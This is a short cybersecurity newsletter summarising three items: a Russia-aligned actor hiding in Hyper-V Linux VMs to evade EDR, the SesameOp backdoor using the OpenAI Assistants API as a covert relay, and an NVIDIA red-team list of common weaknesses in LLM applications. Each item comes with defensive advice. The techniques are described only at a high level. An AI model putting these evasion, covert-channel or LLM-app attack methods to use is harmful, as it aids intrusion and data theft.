CCTR.46.NOV.25
Monday morning cyber coffee read CCTR.46.NOV.25
Some slick tradecrafts by Curly COMrades, a threat actor aligned with Russian interests.
They enabled Hyper-V on victims’ Windows hosts to spin up lightweight 120 MB Alpine Linux VMs operating outside the reach of host-based EDR, creating an isolated and persistent foothold.

As host defences mature, attackers are moving down-stack. EDR is not a silver bullet. Treat EDR as one layer, not the whole defence.
Microsoft discovered a new espionage-focused backdoor dubbed SesameOp, which abused the OpenAI Assistants API as a covert relay rather than using traditional C2 infrastructure.
This allowed the threat actor to blend malicious activity with legitimate traffic, effectively hiding within normal cloud communications. The attacker did not exploit any vulnerability in OpenAI systems but instead repurposed a legitimate service for stealthy operations.
Monitor for unusual API traffic or outbound connections to unexpected cloud endpoints.
Expect threat actors to weaponise emerging AI services as covert channels, defenders must adapt just as fast.
The NVIDIA AI Red Team has evaluated number of AI powered applications and uncovered three potential high security risks vulnerabilities that consistently appear across LLM implementations.
Executing LLM-generated code that can lead to remote code execution
Insecure permissions in RAG data stores that enable data leakage or prompt injection
Active content rendering of model outputs that can result in data exfiltration.

Addressing these vulnerabilities early can significantly strengthen and harden LLM-based applications against the most common and damaging attacks.
AI security is Application Security. Nothing magical about it.
Don’t execute what the model says.
Don’t trust what it retrieves.
Don’t render what it outputs.
https://developer.nvidia.com/blog/practical-llm-security-advice-from-the-nvidia-ai-red-team
Last updated